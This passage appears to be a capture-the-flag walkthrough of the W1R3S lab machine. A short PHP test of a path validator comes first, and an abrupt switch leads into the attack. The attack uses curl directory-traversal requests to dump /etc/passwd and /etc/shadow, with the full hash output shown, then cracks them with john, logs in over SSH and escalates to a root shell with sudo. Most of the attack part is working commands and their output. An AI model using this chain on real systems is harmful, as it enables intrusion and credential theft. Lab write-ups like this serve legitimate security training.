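$tmp = sys_get_temp_dir() . '/cfg_' . bin2hex(random_bytes(4));
mkdir($tmp);
file_put_contents($tmp . '/menu.php', "<?php // placeholder field config\n");

$checks = [
    'plain file name accepted'          => safe_config_path($tmp, 'menu.php') !== null,
    'traversal to /etc/passwd rejected' => safe_config_path($tmp, '../../../../../../../../../etc/passwd') === null,
    'php://filter wrapper rejected'     => safe_config_path($tmp, 'php://filter/convert.base64-encode/resource=x') === null,
    'NUL byte rejected'                 => safe_config_path($tmp, "menu.php\0.txt") === null,
    'missing file rejected'             => safe_config_path($tmp, 'nope.php') === null,
];
foreach ($checks as $name => $ok) {
    echo ($ok ? 'PASS' : 'FAIL') . ": $name\n";
}

unlink($tmp . '/menu.php');
rmdir($tmp);
```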

curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://172.19.0.15/administrator/alerts/alertConfigField.php

--data-urlencode sends the data URL-encoded in the body of a POST request.

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
w1r3s:x:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:122:129:ftp daemon,,,:/srv/ftp:/bin/false
mysql:x:123:130:MySQL Server,,,:/nonexistent:/bin/false

We successfully dumped the content we wanted, but that is not enough; to get the passwords we also need the shadow file.

curl --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://172.19.0.15/administrator/alerts/alertConfigField.php
daemon:*:17379:0:99999:7:::
bin:*:17379:0:99999:7:::
sys:*:17379:0:99999:7:::
sync:*:17379:0:99999:7:::
games:*:17379:0:99999:7:::
man:*:17379:0:99999:7:::
lp:*:17379:0:99999:7:::
mail:*:17379:0:99999:7:::
news:*:17379:0:99999:7:::
uucp:*:17379:0:99999:7:::
proxy:*:17379:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
backup:*:17379:0:99999:7:::
list:*:17379:0:99999:7:::
irc:*:17379:0:99999:7:::
gnats:*:17379:0:99999:7:::
nobody:*:17379:0:99999:7:::
systemd-timesync:*:17379:0:99999:7:::
systemd-network:*:17379:0:99999:7:::
systemd-resolve:*:17379:0:99999:7:::
systemd-bus-proxy:*:17379:0:99999:7:::
syslog:*:17379:0:99999:7:::
_apt:*:17379:0:99999:7:::
messagebus:*:17379:0:99999:7:::
uuidd:*:17379:0:99999:7:::
lightdm:*:17379:0:99999:7:::
whoopsie:*:17379:0:99999:7:::
avahi-autoipd:*:17379:0:99999:7:::
avahi:*:17379:0:99999:7:::
dnsmasq:*:17379:0:99999:7:::
colord:*:17379:0:99999:7:::
speech-dispatcher:!:17379:0:99999:7:::
hplip:*:17379:0:99999:7:::
kernoops:*:17379:0:99999:7:::
pulse:*:17379:0:99999:7:::
rtkit:*:17379:0:99999:7:::
saned:*:17379:0:99999:7:::
usbmux:*:17379:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
sshd:*:17554:0:99999:7:::
ftp:*:17554:0:99999:7:::
mysql:!:17554:0:99999:7:::

We save the hashes in a file named password and run a password crack against it.

┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ john password 
Created directory: /home/pixe1_p0ints/.john
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
www-data         (www-data)     
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
computer         (w1r3s)     
2g 0:00:00:01 DONE 2/3 (2023-12-30 10:54) 1.739g/s 3503p/s 3504c/s 3504C/s 123456..random
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

This tells us the hashes are most likely salted SHA-512 (sha512crypt). The password for www-data is www-data, and the password for w1r3s is computer.
We try logging in as www-data, but it seems not to have a bash shell; it only shows us some information.
So we log in with another account instead.

┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ ssh w1r3s@172.19.0.15
----------------------
Think this is the way?
----------------------
Well,........possibly.
----------------------
w1r3s@172.19.0.15's password: 
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.13.0-36-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

102 packages can be updated.
0 updates are security updates.

New release '18.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

.....You made it huh?....
Last login: Mon Jan 22 22:47:27 2018 from 192.168.0.35
w1r3s@W1R3S:~$ 

Login succeeded; now check our privileges.

w1r3s@W1R3S:~$ whoami
w1r3s
w1r3s@W1R3S:~$ sudo -l
[sudo] password for w1r3s: 
Matching Defaults entries for w1r3s on W1R3S.localdomain:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User w1r3s may run the following commands on W1R3S.localdomain:
    (ALL : ALL) ALL

It shows we have full sudo rights; the penetration succeeded.

sudo /bin/bash
cd root
ls
cat flag.txt

[screenshot]
Flag read successfully.
